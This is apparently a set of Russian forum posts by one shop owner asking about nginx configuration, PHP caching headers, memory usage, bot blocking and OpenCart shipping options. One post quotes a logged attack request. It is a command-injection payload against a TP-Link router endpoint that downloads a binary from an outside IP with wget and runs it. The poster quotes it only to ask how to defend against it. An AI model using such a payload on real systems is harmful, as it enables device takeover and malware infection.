Rashp

Всем здравствуйте! Подскажите пожалуйста, как правильно закрыть IP в nginx от прямого доступа? Надоели левые запросы по IP и не повлияет ли это на индексацию? Я сделал следующую конструкцию, не знаю, корректно ли это? server { listen 80; server_name domain.ru www.domain.ru; return 301 https://domain.ru$request_uri; } server { set $host_path "/var/www/webroot"; set $index "index.php"; set $fpm_sock "/run/php/php7.3-fpm-domain.sock"; listen 443 ssl http2; ssl_certificate /etc/nginx/ssl/fullchain.pem; ssl_certificate_key /etc/nginx/ssl/privkey.pem; ssl_trusted_certificate /etc/nginx/ssl/chain.pem; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always; add_header X-XSS-Protection "1; mode=block"; add_header X-Frame-Options SAMEORIGIN; add_header X-Permitted-Cross-Domain-Policies master-only; add_header X-Content-Type-Options nosniff; set $domain_name "domain.ru"; server_name domain.ru www.domain.ru; root $host_path/; index $index; default_type text/html; access_log off; error_log /var/www/logs/nginx/error.log crit; if ($host = 'www.$domain_name') { return 301 https://$domain_name$request_uri; } server { listen 0.0.0.0:80 default_server; listen 0.0.0.0:443 default_server; server_name _; return 444; }

Всем, привет, помогите плз. мозгов не хватает прикрутить в header.twig <meta http-equiv="expires" content="{{ expires }}"> <meta http-equiv="last-modified" content="{{ last_modified }}"> сделал в catalog/controller/common/lastmodified.php <?php // Установите заголовки $Expires = @date('D, d M Y H:i:00', time() + 360000); $num = mt_rand(2000, 10000); $LastModified = gmdate("D, d M Y H:i:s \G\M\T", time() - $num); $IfModifiedSince = false; if (isset($_ENV['HTTP_IF_MODIFIED_SINCE'])) $IfModifiedSince = strtotime(substr($_ENV['HTTP_IF_MODIFIED_SINCE'], 5)); if (isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])) $IfModifiedSince = strtotime(substr($_SERVER['HTTP_IF_MODIFIED_SINCE'], 5)); if ($IfModifiedSince && $IfModifiedSince >= $num) { header($_SERVER['SERVER_PROTOCOL'] . ' 304 Not Modified'); exit; } Установка заголовков header('Expires: ' . $Expires); header('Last-Modified: ' . $LastModified); Загрузка и рендеринг шаблона Twig $this->load->view('common/header', $data); ?> но последний блок не работает чтоб зацепить его в header подскажите плз. Заранее благодарен

Знающие, ответьте пожалуйста.

Всем здравствуйте, после переезда на новые сервера, столкнулся по странными запросами вот такого вида: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) пытаются грузить на сервер shell и получить доступ к сайту, стандартные методы борьбы не особо помогают, менял права на /tmp на 755, 775, но сайт падает на 500, где сайт и /tmp могут быть связаны и как можно купировать эту проблему?

Нашел где течет, причем случайно, когда переезжал на другой сервер. Зашел в ini, который cli там был установлен memory_limit = -1, он собственно и выедал память, ограничил до 1024M, пока буду посмотреть, что из этого. получится

Переехал на другие сервера и настроил ddos guard, вроде пока отбился )

Потому, что в нестабильном мире живем, в любой момент возможны варианты ))) А в бизнесе, надо учитывать риски cloudflare на данный момент это повышенные риски.

Всем здравствуйте, Кто-нибудь настраивал защиту от поведенческих ботов? Задолбали боты Biterika LLC, уже многое перепробовал, у меня есть настройка nginx - blackips, но мне кажется это полная шляпа и на работу движка как-то не хорошо влияет. Ставил какой-то г*в#* модуль Messor, тоже полная фигня. Кто-то настраивал блокировку по ASN не через cloudflare (не безопасно это сейчас настраивать). Или есть еще какие нибудь методы борьбы?

нет у меня апача и почтаря тоже, все ресурсы на сервере заточены под магазин, уже лет 8 как живу под php-fpm + nginx последний лог был: 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB 2023-11-05 19:10:02: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 200904 kB т.е идет рост нагрузки, медленно но идет вчера сервер матерился на нагрузку CPU более 100%, может пионеры ддосить пытались, не знаю. У меня меньше 29 гиг использование памяти не снижалось последнее время, а тут до 3,7 упало, я конечно сегодня включил по крону очистку sync; echo 1 > /proc/sys/vm/drop_caches - если уровень памяти упадет меньше 10 гиг, но это костыли. Хотелось бы найти все же причину такого поведения сервера. Постоянно пинать сервант, тоже не хочется. Ребутом конечно все лечится, но хочется чтоб по человечески работало все.

Всем здравствуйте, есть VPS на Debian 6 ядер, 32 гига RAM настроен на работу как часы, но иногда часы сбоят раз в несколько дней выжирает память до 3 гигов Сегодня аж поплохело посмотрел cat /proc/meminfo, а там MemFree: 370000 kb сегодня поставил скрипт на крон: #!/bin/bash LOG_FILE=/var/www/logs/memory/memory.log write_to_log() { echo "$(date "+%Y-%m-%d %H:%M:%S"): $1" >> "$LOG_FILE" } while true; do process_info=$(ps aux --sort -rss | head -n 2 | tail -n 1) pid=$(echo "$process_info" | awk '{print $2}') memory=$(echo "$process_info" | awk '{print $6}') process_name=$(ps -p "$pid" -o comm=) write_to_log "Наиболее ресурсоемкое приложение: $process_name (PID: $pid), использование памяти: $memory kB" echo "Наиболее ресурсоемкое приложение: $process_name (PID: $pid), использование памяти: $memory kB" sleep 300 done выдает пока только: 2023-11-05 18:30:01: Наиболее ресурсоемкое приложение: mysqld (PID: 816), использование памяти: 169508 kB есть кто знающий - может мускуль так память выжирать? (я пока мониторить только начал процессы) Если это мускуль, как остановить утечку памяти?

Вроде заработало, спасибо огромное

установлена, в ней только кукисы включены, отключал, не помогает

Всем здравствуйте, подскажите пожалуйста при выходе из зарегистрированного пользователя (оптовый покупатель с ценами отличными от общих) сессия залипает (цены у гостя остаются такие-же как были у зарегистрированного) приходится очищать принудительно кэш браузера, где можно глянуть поковырять, чтобы сессия при выходе очищалась? Заранее благодарен.

я хочу скрыть текст на странице для отдельных товаров т.е. <div class="fm-online-save">Вы можете сэкономить 2% при оплате онлайн!</div> Но для того, чтобы его скрыть нужен текст к которому можно привязаться например "Подарочная карта" (условно) Я прекрасно понимаю, что можно решить через twig и поиск подстроки,но я в этом не особо... никак не могу взять себя в руки и почитать RTFM, времени не хватает (

Всем, здравствуйте, подскажите пожалуйста с помощью css хочу скрыть текст на странице товара, но не могу найти правильный синтаксис запроса обычный бы выглядел так: h1[fm-page-title ="текст"] {display:none}, а мне нужно скрыть другой класс т.е. чтобы получился запрос вида if {....} else {.....}, но только в css.

конечно решение скажем не окончательное, еще бы скрыть остальные методы доставки для товара, но все же ....

Пардон, тема закрыта, совсем забыл про Filterit - Управление доставкой, оплатой и учетом в заказе

Всем здравствуйте, не подскажете может кто встречал, нужна отдельный вид доставки для отдельно взятого товара? Если быть точнее, у меня стоит скидка на оплату онлайн, этот товар должен продаваться без скидки по стоимости номинала, дальше можно связать в симпле доставку и оплату, но опять же оговорюсь нужен метод доставки для отдельно взятого товара.